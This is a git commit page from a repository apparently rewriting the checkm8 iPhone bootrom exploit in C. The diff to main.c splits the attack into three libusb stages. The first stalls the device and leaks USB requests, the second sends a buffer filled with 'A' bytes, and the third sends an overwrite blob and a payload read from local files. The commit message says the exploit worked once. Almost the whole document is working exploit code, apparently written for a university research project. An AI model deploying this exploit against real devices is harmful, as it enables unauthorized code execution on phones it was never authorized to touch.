grg/checkm8_tool
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

ohmygod it worked (once)

Browse Source
This commit is contained in:
Gregor Haas
2019-10-26 18:18:21 -04:00
parent 43ceba8e6f
commit a17fd89015
6 changed files with 111 additions and 70 deletions
Download Patch File Download Diff File Expand all files Collapse all files

148
main.c
View File

@@ -5,60 +5,19 @@
#include "libusb_helpers.h"
int main()
int complete_stage(int stage_function(libusb_device_handle *handle))
{
int ret;
libusb_context *usb_ctx = NULL;
libusb_init(&usb_ctx);
struct libusb_device_bundle usb_bundle;
get_test_device(usb_ctx, &usb_bundle);
if(usb_bundle.handle == NULL)
{
libusb_exit(usb_ctx);
printf("Could not find device\n");
return 1;
}
struct libusb_device_handle *usb_handle = usb_bundle.handle;
struct libusb_device_descriptor usb_desc = usb_bundle.descriptor;
ret = libusb_set_auto_detach_kernel_driver(usb_handle, 1);
if(ret > 0)
{
printf("%s\n", libusb_error_name(ret));
exit(1);
}
unsigned char usb_serial_buf[128];
unsigned char usb_data_buf[2048];
unsigned char usb_transfer_buf[2048];
libusb_get_string_descriptor_ascii(usb_handle, usb_desc.iSerialNumber, usb_serial_buf, sizeof(usb_serial_buf));
printf("Found device with serial %s\n", usb_serial_buf);
libusb_context *usb_ctx = NULL;
struct libusb_device_bundle usb_bundle;
struct libusb_device_handle *usb_handle;
struct libusb_device_descriptor usb_desc;
// begin the USB magic section
unsigned int i;
stall(usb_handle);
for(i = 0; i < 5; i++)
{
no_leak(usb_handle);
}
usb_req_leak(usb_handle);
no_leak(usb_handle);
libusb_reset_device(usb_handle);
libusb_close(usb_handle);
libusb_exit(usb_ctx);
usb_bundle.handle = NULL;
// section 2
libusb_init(&usb_ctx);
get_test_device(usb_ctx, &usb_bundle);
if(usb_bundle.handle == NULL)
{
libusb_exit(usb_ctx);
@@ -69,5 +28,100 @@ int main()
usb_handle = usb_bundle.handle;
usb_desc = usb_bundle.descriptor;
libusb_get_string_descriptor_ascii(usb_handle, usb_desc.iSerialNumber, usb_serial_buf, sizeof(usb_serial_buf));
printf("Found device with serial %s\n", usb_serial_buf);
ret = libusb_set_auto_detach_kernel_driver(usb_handle, 1);
if(ret > 0)
{
printf("%s\n", libusb_error_name(ret));
return ret;
}
ret = stage_function(usb_handle);
libusb_close(usb_handle);
libusb_exit(usb_ctx);
return ret;
}
int stage1_function(libusb_device_handle *handle)
{
printf("~~~ Stage 1 ~~~\n");
unsigned int i;
stall(handle);
for(i = 0; i < 5; i++)
{
no_leak(handle);
}
usb_req_leak(handle);
no_leak(handle);
libusb_reset_device(handle);
return 0;
}
int stage2_function(libusb_device_handle *handle)
{
printf("~~~ Stage 2 ~~~\n");
unsigned char databuf[0x800];
memset(databuf, 'A', 0x800);
libusb1_async_ctrl_transfer(handle, 0x21, 1, 0, 0, databuf, 0x800, 1);
libusb1_no_error_ctrl_transfer(handle, 0x21, 4, 0, 0, NULL, 0, 0);
libusb_reset_device(handle);
return 0;
}
int stage3_function(libusb_device_handle *handle)
{
printf("~~~ Stage 3 ~~~\n");
unsigned char overwrite_buf[1524];
FILE *overwrite_file = fopen("/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/bin/overwrite.bin", "r");
fread(overwrite_buf, 1524, 1, overwrite_file);
fclose(overwrite_file);
unsigned char payload_buf[2400];
FILE *payload_file = fopen("/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/bin/payload.bin", "r");
fread(payload_buf, 2400, 1, payload_file);
fclose(payload_file);
usb_req_stall(handle);
usb_req_leak(handle);
libusb1_no_error_ctrl_transfer(handle, 0, 0, 0, 0, overwrite_buf, 1524, 100);
libusb1_no_error_ctrl_transfer(handle, 0x21, 1, 0, 0, payload_buf, 2048, 100);
libusb1_no_error_ctrl_transfer(handle, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100);
libusb_reset_device(handle);
return 0;
}
int check_function(libusb_device_handle *handle)
{
return 0;
}
int main()
{
int ret = complete_stage(stage1_function);
if(ret == 0)
{
ret = complete_stage(stage2_function);
}
usleep(2000);
if(ret == 0)
{
ret = complete_stage(stage3_function);
}
complete_stage(check_function);
return ret;
}